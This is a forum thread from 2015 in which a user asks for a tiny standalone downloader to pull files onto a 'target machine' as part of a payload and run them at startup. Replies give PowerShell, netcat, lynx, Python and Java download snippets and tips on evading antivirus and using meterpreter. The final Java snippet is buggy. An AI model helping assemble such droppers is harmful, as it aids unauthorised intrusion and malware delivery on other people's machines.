vailixi Posted July 6, 2015 Posted July 6, 2015 Looking for an minimal FTP or WGET type program that I can use as part of a payload. Just has to really simple and very small program. No command line arguments or GUI needed just code in the URL of the file you want to get. Doesn't require outside libraries ie curl, boost, .NET, so it is a standalone program that will run on most machines. Just need to get a few files from the internet and and save them to a specific location on the target machine. Basically want to download the programs to the machine and run them on startup. Seems like all of the "simple" programs that will do this require a lib that is like 2400 additional files. I'm wondering if I can do this with maybe 1, 2 or 3 files? If you want to post an example in another language that's cool. Doesn't have to be C. Just easily deployable. Any thoughts? Quote
Jason Cooper Posted July 6, 2015 Posted July 6, 2015 Have you looked at TFTP [Wikipedia entry, RFC]? It's a lot simpler that other file transfer protocols (which will make it slower), but there are plenty of standalone clients about. Quote
digip Posted July 8, 2015 Posted July 8, 2015 FTP servers require a login and password by default, so scripting, will probably still be needed unless you pre-load all the info into a bundled executable. What OS are you using as the target? Most machines have some form of built in FTP clients, but no FTP works without commands other than scripting it to do the login and downloads for you. You might want to take advantage of things like PowerShell on a windows OS since this will be installed by default on anything later than XP - https://www.google.com/#q=powershell+download+file and For linux, almost all distros have FTP installed, but you can also use lynx if installed on Linux: lynx -dump http://somesite.com/file.ext If using Metasploit and looking for payloads though, just use meterpeter and send the files over using Metasploit itself. Mind you, you want things to stay off disk so they don't get scanned or caught by the target system, so not sure you would want to use tools known to be scanned for that could get you caught, and you can use the OS itself to just do it for you without setting off alarms. What you upload to the target it a whole other ball game and the programs you upload themselves need to pass AV and malware scans. Quote
cooper Posted July 8, 2015 Posted July 8, 2015 FTP servers require a login and password by default The simple ones don't. Anonymous FTP used to be the most common form before all you eeeevil haxorz had your way with them. Quote
digip Posted July 8, 2015 Posted July 8, 2015 The simple ones don't. Anonymous FTP used to be the most common form before all you eeeevil haxorz had your way with them. Anonymous ftp still requires you to enter: User: anonymous Pass: anonymous@somesite.com (any email address basically) Quote
vailixi Posted July 15, 2015 Author Posted July 15, 2015 I like the powershell idea. I think doing this on Windows is going to be pretty simple. Maybe just write out an array of all of the possible networking tools and their possible install locations and loop through until it finds a networking tool that will do the job. I had a heck of a time trying to do this on Ubuntu because it wanted a sudoer password for each system call. The code executes but it needs user interaction. Debian is set up with the root user as default so you can run a bunch of system calls without any extra permissions. I'm actually really surprised there isn't some kind of downloader payload already available. This is the simplest example I could come up with thus far. Python. #!/usr/bin/python import urllib urllib.urlretrieve("http://hak5.org/wp-content/uploads/2012/08/hak5-50.png", filename="hak5-50.png") I suppose I can make that happen py2exe, one of those python compilers. QB64 has some simple networking features but they currenly only work on Windows. Not that that is a bad thing. Also anybody know a scripted way to do this with metasploit? I'll probably come up with quite a few ways to do this by the time I'm finished. Thanks everybody for ideas. Quote
cooper Posted July 15, 2015 Posted July 15, 2015 Jeez. I thought you wanted light weight. Python is a lot of things, but it installs at a few megs minimum. On a Linux box, try curl or wget which are both downloading tools you can script up the wazoo, are effectively installed everywhere and won't require root access either. Quote
vailixi Posted July 16, 2015 Author Posted July 16, 2015 +1 for sure. A call to to wget might be the easiest way to handle this on a Linux box. Powershell on Windows as someone had suggested. Maybe just system calls. Coding. Thanks guys. Quote
digip Posted July 16, 2015 Posted July 16, 2015 I don't have the link handy, but I saw something the other day that bypasses sudo systematically using tools that can execute code without need for root.Namely tar was one of them listed that allows you to start up other programs as root(if I read the article correctly) by piping it out in a bash script. Personally I'd prefer something encrypted such as scp or sftp, but to use built in tools, ftp is built into most OS's, even if it sends everything you do in the clear, it works. If you wanted a quick download, there are other ways of downloading in windows with bat and VBS scripting, although powershell would be one way from the command line alone. If you don't specify the whole path in the output part(c:\file.txt) then it saves it to the default user's directory, ie: c:\users\username\file.txt - Power shell one liner: (new-object System.Net.WebClient).DownloadFile('http://www.somfile.com/file.txt','c:\file.txt') parenthesis are required or it will error out. Could write a cmdlet.ps1 script as well but I'm not much of a powershell user. I googled for the above example to test myself, which worked and how I found out windows wants a full path for the output or it puts it in the home directory. I used to have a VBS one for wscript that came in handy on some XP machines back in the day but sure you can google for help with those. Quote
vailixi Posted July 17, 2015 Author Posted July 17, 2015 I don't have the link handy, but I saw something the other day that bypasses sudo systematically using tools that can execute code without need for root.Namely tar was one of them listed that allows you to start up other programs as root(if I read the article correctly) by piping it out in a bash script. Personally I'd prefer something encrypted such as scp or sftp, but to use built in tools, ftp is built into most OS's, even if it sends everything you do in the clear, it works. If you wanted a quick download, there are other ways of downloading in windows with bat and VBS scripting, although powershell would be one way from the command line alone. If you don't specify the whole path in the output part(c:\file.txt) then it saves it to the default user's directory, ie: c:\users\username\file.txt - Power shell one liner: (new-object System.Net.WebClient).DownloadFile('http://www.somfile.com/file.txt','c:\file.txt') parenthesis are required or it will error out. Could write a cmdlet.ps1 script as well but I'm not much of a powershell user. I googled for the above example to test myself, which worked and how I found out windows wants a full path for the output or it puts it in the home directory. I used to have a VBS one for wscript that came in handy on some XP machines back in the day but sure you can google for help with those. Gotta love one liners. These are all really good suggestions. Quote
fugu Posted July 17, 2015 Posted July 17, 2015 (edited) I know someone had already mentioned netcat but $ echo -ne "GET /file.txt HTTP/1.1\r\nHost: www.somfile.com\r\n\r\n" | nc www.somfile.com 80 > ./file.txt EDIT: this will also include the server header information, which will need to be removed. I just forgot about that. Edited July 17, 2015 by fugu Quote
digip Posted July 17, 2015 Posted July 17, 2015 I know someone had already mentioned netcat but $ echo -ne "GET /file.txt HTTP/1.1\r\nHost: www.somfile.com\r\n\r\n" | nc www.somfile.com 80 > ./file.txtEDIT: this will also include the server header information, which will need to be removed. I just forgot about that. Yeah, I was looking at ways of doing it with telnet logging the output, but as you mentioned, it put all the headers in the file, not to mention messes up the encoding and spacing. netcat adds the headers, but 1, not a native app of any OS, which helps with using built in tools for downloading, and 2, if using external tools, wget would probably be the easiest to use command line tool. Quote
cooper Posted July 17, 2015 Posted July 17, 2015 Well, since you're getting the payload to grab a file off of a server you control, you could modify the server to not include any headers for a specific request and just dump the binary into the socket. Might mess up proxy servers and such though, but if you're running an HTTPS server that problem will be circumvented aswell. Quote
fugu Posted July 19, 2015 Posted July 19, 2015 Ok it was bugging me that I couldn't figure this out, but here is a jacked up way to do it: $ echo -ne "GET /file.txt HTTP/1.1\r\nHost: www.somfile.com\r\n\r\n" | nc www.somfile.com 80 | sed ':a;N;$!ba;s/\r\n\r\n/\x00/' | sed ':a;N;$!ba;s/[^\x00]*\x00//' > ./file.txt this "should" remove the headers, however as I've read, sed does not always allow the use of ; so on some systems this might not work Quote
cooper Posted July 20, 2015 Posted July 20, 2015 Pipe it through this sed command sed '1,/^\s*$/d' HTTP gives you all the headers and such, then an empty line, then the actual contents. This sed statement will drop everything up until and including this empty line. Quote
vailixi Posted August 17, 2015 Author Posted August 17, 2015 (edited) I'm trying this Powershell thing on Windows 7. Powershell (New-Object System.Net.WebClient).DownloadFile('Url', Path) Sometimes I'm getting an error like: The file name, directoryname, or volume label syntax is incorrect. Or I get an overload error. What am I doing wrong? I've never really used powershell. Edited August 17, 2015 by vailixi Quote
digip Posted August 17, 2015 Posted August 17, 2015 open cmd.exe > powershell (enter) (new-object System.Net.WebClient).DownloadFile('http://www.ticktockcomputers.com/robots.txt','c:\file.txt') Is path surrounded with single quotes? Not sure if that makes a different, but I also assume you're being generic, and not using path but instead the full drive path needed. I just downloaded my sites robots.txt file, code exactly like pasted above Quote
vailixi Posted August 18, 2015 Author Posted August 18, 2015 I'm getting an error about an exception occurred during a web client request. line 1 char 47. Quote
digip Posted August 18, 2015 Posted August 18, 2015 Open wireshark, start capturing, and then try the command. Check wireshark when the error happens, but I'm guessing, it's an issue retrieving the file and you may learn more looking through the traffic to see what happens. To test this, try grabbing a different known file as well, see if it works. If it does it for all files, then maybe some settings in your system, or you need to elevate to admin(although I didn't have to on my system). Quote
cooper Posted August 18, 2015 Posted August 18, 2015 Verify the use of a slash in a path. Chances are you need double-slashes (because the slash might be the escape char for special characters) or alternatively prepent the path with an '@' to indicate there is nothing to escape in there and slashes are just that : slashes. It's something C# does so I wouldn't be surprised if it leaked into the powershell syntax. Quote
vailixi Posted August 26, 2015 Author Posted August 26, 2015 (edited) I was having about zero success with powershell but I did find a nice java snippet that works. I need to include some error code so it doesn't crash if the server comes back 403 or something like that. But it does download and save the file. Not exactly a one liner though. import java.io.BufferedInputStream; import java.io.ByteArrayOutputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.net.URL; public class DownloadFile { public static void main(String[] args) throws IOException { String fileName = "filename"; //The file that will be saved on your computer URL link = new URL("url"); //The file that you want to download //download InputStream in = new BufferedInputStream(link.openStream()); ByteArrayOutputStream out = new ByteArrayOutputStream(); byte[] buf = new byte[1024]; int n = 0; while (-1!=(n=in.read(buf))) { out.write(buf, 0, n); } out.close(); in.close(); byte[] response = out.toByteArray(); FileOutputStream fos = new FileOutputStream(fileName); fos.write(response); fos.close(); //end of download } } Got it here: http://code.runnable.com/Uu83dm5vSScIAACw/download-a-file-from-the-web-for-java-files-and-save Edited August 26, 2015 by vailixi Quote
cooper Posted August 26, 2015 Posted August 26, 2015 (edited) Well, we can reduce that quite a bit: import java.io.FileOutputStream; import java.io.InputStream; import java.net.URL; public class DownloadFile { public static void main(String[] args) throws Exception { FileOutputStream out = new FileOutputStream(args[0]); InputStream in = new URL(args[1]).openStream(); byte[] buf = new byte[1024]; do { int bytesRead = in.read(buf); out.write( buf, 0, bytesRead ); } while (bytesRead >= 0); out.close(); in.close(); } } Edited August 26, 2015 by Cooper Quote
vailixi Posted August 26, 2015 Author Posted August 26, 2015 (edited) ^ Cash money oh something wrong with the bytesRead variable Edited August 26, 2015 by vailixi Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.